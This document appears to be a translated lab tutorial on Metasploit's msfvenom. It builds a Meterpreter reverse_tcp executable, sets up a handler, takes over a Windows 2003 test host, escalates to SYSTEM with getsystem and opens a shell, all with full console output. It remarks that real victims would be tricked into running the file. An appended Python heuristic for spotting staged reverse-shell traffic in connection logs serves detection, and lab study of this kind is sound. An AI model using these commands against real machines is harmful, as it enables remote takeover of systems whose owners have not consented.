msfvenom is a payload generator and also a shellcode generator.
Payload ("有效载荷" in Chinese) refers to the code or instructions that actually run on the target system after a successful exploit.
Shellcode (literally "shell code") is one kind of payload, so named because it establishes a bind or reverse shell.
The complete byte stream generally consists of two parts:
(1) A byte sequence containing part of the code, which is sent to the target machine and executed to help the attacking machine gain control, for example by opening a port on the target or setting up a communication channel.
(2) A part that runs some application on the target host, such as cmd or the calculator (commonly used for a PoC, proof of concept).
The byte sequence sent by an exploit usually contains both the payload and the shellcode.
1. Generating an executable-format payload
root@kali222:~# msfvenom --- show the option parameters
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
...... (rest omitted)
root@kali222:~# msfvenom -l payloads -- list all available payloads
Framework Payloads (546 total) [--payload <value>]
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh
...... (rest omitted)
win2003 (192.168.1.64) is the target machine,
kali (192.168.1.149) is the attacking machine.
Using a reverse (connect-back) payload
Kali listens for the payload; when the payload is run on win2003 it connects back to Kali.
1. Generate test.exe in /root on Kali
root@kali222:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.149 lport=12345 -f exe -o /root/test.exe
2. Copy test.exe to win2003 and run it (in a real environment the win2003 user would have to be induced to run it through social engineering)
3. Start msfconsole and set up the listener
root@kali222:~# service postgresql restart
root@kali222:~# msfdb init
root@kali222:~# msfconsole
4. Load the payload handler module
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp -- set the reverse payload; it must match the one given to msfvenom
msf5 exploit(multi/handler) > set LHOST 192.168.1.149 -- set Kali's IP
msf5 exploit(multi/handler) > set LPORT 12345 -- set Kali's port; it must match the port used in the msfvenom command
msf5 exploit(multi/handler) > show options
5. Wait for the remote payload to run, then execute exploit
msf5 exploit(multi/handler) > exploit ----- before this step, make sure test.exe is already running on win2003
meterpreter > sysinfo -- view information about the target host
6. Privilege escalation
meterpreter > use priv -- load the privilege extension
meterpreter > getsystem -- obtain SYSTEM-level privileges
The win2003 host is now under control. The full session transcript follows:
root@kali222:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.149 lport=12345 -f exe -o /root/test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /root/test.exe
root@kali222:~# service postgresql restart
root@kali222:~# msfdb init
[i] Database already started
[i] The database appears to be already configured, skipping initialization
root@kali222:~# msfconsole
=[ metasploit v5.0.6-dev ]
+ -- --=[ 1856 exploits - 1055 auxiliary - 327 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.149
LHOST => 192.168.1.149
msf5 exploit(multi/handler) > set LPORT 12345
LPORT => 12345
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.149    yes       The listen address (an interface may be specified)
   LPORT     12345            yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.149:12345
[*] Sending stage (179779 bytes) to 192.168.1.64
[*] Meterpreter session 1 opened (192.168.1.149:12345 -> 192.168.1.64:1029) at 2020-04-15 13:45:23 +0800
meterpreter > sysinfo
Computer : OP
OS : Windows .NET Server (Build 3790).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 904 created.
Channel 2 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\桌面>whoani
whoani
'whoani' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
C:\Documents and Settings\Administrator\����>
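The handler transcript above also shows what a staged reverse_tcp payload looks like from the network side: the target opens a connection to an unusual port (12345), sends almost nothing, and immediately receives a 179779-byte stage. The following is an added example (not part of the original post) of a simple detection heuristic over connection-log records; the log format, thresholds, common-port list and sample records are all constructed assumptions for a lab.

```python
import re
from typing import Dict, List

# Constructed sample connection records (not real telemetry), one flow per line:
# ts src sport dst dport orig_bytes resp_bytes
SAMPLE_CONN_LOG = """\
1586929523.1 192.168.1.64 1029 192.168.1.149 12345 312 179779
1586929530.4 192.168.1.64 1030 192.168.1.10 80 512 20480
1586929535.0 192.168.1.64 1031 192.168.1.149 443 201 179779
1586929540.0 192.168.1.64 1032 192.168.1.20 445 800 1200
"""

# Ports a workstation is normally expected to talk to (assumed allow-list for the lab).
COMMON_PORTS = {22, 25, 53, 80, 88, 135, 139, 389, 443, 445, 3389}
# The x86 Meterpreter stage in the session above was 179779 bytes: a staged
# reverse_tcp flow is a tiny client request followed by a large server reply.
STAGE_MIN, STAGE_MAX, CLIENT_MAX = 100_000, 2_000_000, 1_024

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)$")


def parse_conn_log(text: str) -> List[Dict]:
    """Parse the whitespace-separated records into dicts; malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, src, sport, dst, dport, obytes, rbytes = m.groups()
        flows.append({"ts": float(ts), "src": src, "sport": int(sport),
                      "dst": dst, "dport": int(dport),
                      "orig_bytes": int(obytes), "resp_bytes": int(rbytes)})
    return flows


def looks_like_stager(flow: Dict) -> bool:
    """Heuristic: small outbound request, stage-sized inbound blob, uncommon destination port."""
    return (flow["orig_bytes"] <= CLIENT_MAX
            and STAGE_MIN <= flow["resp_bytes"] <= STAGE_MAX
            and flow["dport"] not in COMMON_PORTS)


def find_stager_flows(text: str) -> List[Dict]:
    """Return the flows in the log that match the staged reverse-shell heuristic."""
    return [f for f in parse_conn_log(text) if looks_like_stager(f)]


if __name__ == "__main__":
    for f in find_stager_flows(SAMPLE_CONN_LOG):
        print(f"{f['src']}:{f['sport']} -> {f['dst']}:{f['dport']} "
              f"received {f['resp_bytes']} bytes after sending {f['orig_bytes']}")
```

The third sample record is the same stage size delivered over port 443 and is deliberately not flagged: a port-based rule has a blind spot for payloads that blend into HTTPS-like traffic, so in practice this heuristic should be combined with process-level telemetry (which executable opened the socket) rather than used alone.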